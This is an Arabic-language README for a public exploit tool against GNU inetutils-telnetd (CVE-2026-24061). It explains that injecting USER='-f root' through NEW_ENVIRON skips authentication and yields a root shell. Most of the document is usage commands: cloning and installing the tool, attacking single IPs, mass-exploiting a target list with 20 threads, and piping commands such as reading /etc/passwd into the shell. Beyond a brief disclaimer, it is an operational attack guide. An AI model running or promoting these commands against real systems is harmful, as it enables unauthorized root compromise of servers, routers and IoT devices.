
استغلال لتجاوز المصادقة عن بُعد لـ GNU inetutils-telnetd (CVE-2026-24061) باستخدام حقن CRLF للحصول على شل جذر فوري. يدعم الاستغلال الفردي/الجماعي، وتعدد الخيوط، والمنافذ المخصصة، ووضع الأنابيب، والحفاظ على استمرارية الجلسة.

إصدار GNU inetutils-telnetd - حقن CRLF لتجاوز المصادقة والحصول على شل جذر فوري
يستغل هذا الاستغلال CVE-2026-24061، وهي ثغرة حرجة لتجاوز المصادقة عن بُعد في GNU inetutils-telnetd. من خلال حقن حمولة NEW_ENVIRON مصممة خصيصًا مع USER='-f root'، يتم تجاوز المصادقة والحصول على شل جذر فوري دون أي بيانات اعتماد.
ملاحظة: البرنامج النصي
basic_exploit.shهو نسخة مبسطة وأسرع منexploit.sh؛ ومع ذلك، يُنصح باستخدامexploit.shللوظائف الكاملة.
| المنتج | الإصدارات |
|---|---|
| GNU inetutils-telnetd | 1.9.3 - 2.7 |
| توزيعات لينكس المتأثرة | Debian و CentOS و Ubuntu وتوزيعاتها. (Zorin OS و Linux Mint و Pop!_OS و Elementary OS) |
| الأجهزة المدمجة | NAS و IoT والموجهات |
⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لاختبار الأمان المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به غير قانوني.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit
# Python version
pip3 install -r requirements.txt
# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh
# Python version
python3 exploit.py -u 192.168.1.100
# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323
# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20
# Bash version
./exploit.sh -l targets.txt -m 20
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100
# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v
# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5
# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive
اطّلع على مستودعات الاستغلال الأخرى الخاصة بي:
| الفئة | الميزات |
|---|
| الاستغلال | ✅ تجاوز المصادقة عبر حقن CRLF ✅ شل جذر فوري ✅ حقن مستخدم مخصص (-f admin, -f user) |
| المسح | ✅ استغلال هدف واحد ✅ استغلال جماعي من ملف ✅ تعدد الخيوط (خيوط قابلة للتكوين) ✅ دعم منفذ مخصص |
| متقدم | ✅ وضع الأنبوب (تنفيذ الأوامر عبر stdin) ✅ إبقاء الجلسة نشطة ✅ آلية إعادة المحاولة ✅ التحكم في المهلة |
| سهولة الاستخدام | ✅ مخرجات ملونة (colorama) ✅ لغة مزدوجة (Python و Bash) ✅ وضع الإسهاب/التصحيح |
| المختصر | الطويل | الوصف | الافتراضي |
|---|
-u | --url | عنوان IP الهدف | مطلوب |
-p | --port | منفذ الهدف | 23 |
-l | --list | ملف يحتوي على قائمة الأهداف | لا شيء |
-m | --max-threads | الحد الأقصى للخيوط للاستغلال الجماعي | 10 |
-usr | --username | اسم المستخدم للحقن | root |
-t | --timeout | مهلة المقبس (بالثواني) | 10 |
-r | --retries | عدد محاولات إعادة المحاولة | 3 |
-v | --verbose | تفعيل مخرجات التصحيح | False |
--keep-alive | إبقاء الجلسة نشطة بعد الاستغلال | False |